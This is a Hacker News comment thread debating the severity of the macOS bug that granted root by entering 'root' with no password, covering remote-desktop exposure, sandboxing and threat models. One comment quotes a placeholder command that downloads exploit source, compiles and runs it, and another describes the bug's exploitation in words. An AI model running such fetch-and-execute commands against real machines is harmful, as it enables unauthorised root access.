Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

>As serious as this is

... So, not at all? It’s a LPE for gods sake. EDIT: Apparently it affects remote desktop too, so not just a LPE.

Can this even be exploited from within the sandbox?



Not just local. VNC and other remote protocols are vulnerable.


Ah, that's far more interesting. Do you know if SSH is affected?


SSH is not affected.


LPE matters a lot for enterprise and educational customers.

What do you mean by exploited from within the sandbox? This is exploitable from any login prompt where the user has the ability to enter a username, including ones in the shell.


>LPE matters a lot for enterprise and educational customers.

Surely not. In real life LPE bugs are far too common to matter a lot to anyone.

>What do you mean by exploited from within the sandbox? This is exploitable from any login prompt where the user has the ability to enter a username, including ones in the shell.

I'm not familiar enough with the OS X sandbox, but I would guess that sandboxed applications aren't allowed to fill in login prompts. I might be wrong though.


>I'm not familiar enough with the OS X sandbox, but I would guess that sandboxed applications aren't allowed to fill in login prompts. I might be wrong though.

Oh, right. I tend to kind of forget that the App Store serves any other purpose than to deliver software updates as most of the applications on my Mac are from other sources. Yes, I agree that sandboxed apps are almost certainly prohibited from filling in login prompts by default. There does appear to be a system by which sandboxed apps can ask for addition permissions but I'm not an OS X/macOS application developer so I have no idea how this permissions system works.

>Surely not. In real life LPE bugs are far too common to matter a lot to anyone.

LPE bugs might be common but they're rarely as extremely straightforward as typing "root" into a login prompt with no password and pressing enter a few times.


>LPE bugs might be common but they're rarely as extremely straightforward as typing "root" into a login prompt with no password and pressing enter a few times.

Often enough a `wget http://xxx.xxx/xxx.c&&gcc xxx.c&&./a.out` will suffice. I'm not convinced that the ease of exploitation makes this bug particularly serious as a LPE.


LPE's are very serious for the countless college campuses, public libraries, and design print shops like Kinkos that offer public access to Mac computers.


Very serious or minor annoyance? "college campuses" don't strike me as the kind of places where any security issues are considered "very serious".


this LPE would allow anyone to install a kext rootkit on the machine. how is that not serious?


Why is that significantly more serious than them running any other backdoor as a normal user?

I don't understand the threat model here, it is always completely unreasonable to expect that an attacker wouldn't easily be able to escalate privileges locally in a multi-user system.


I'd imagine it makes device theft rather more serious.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: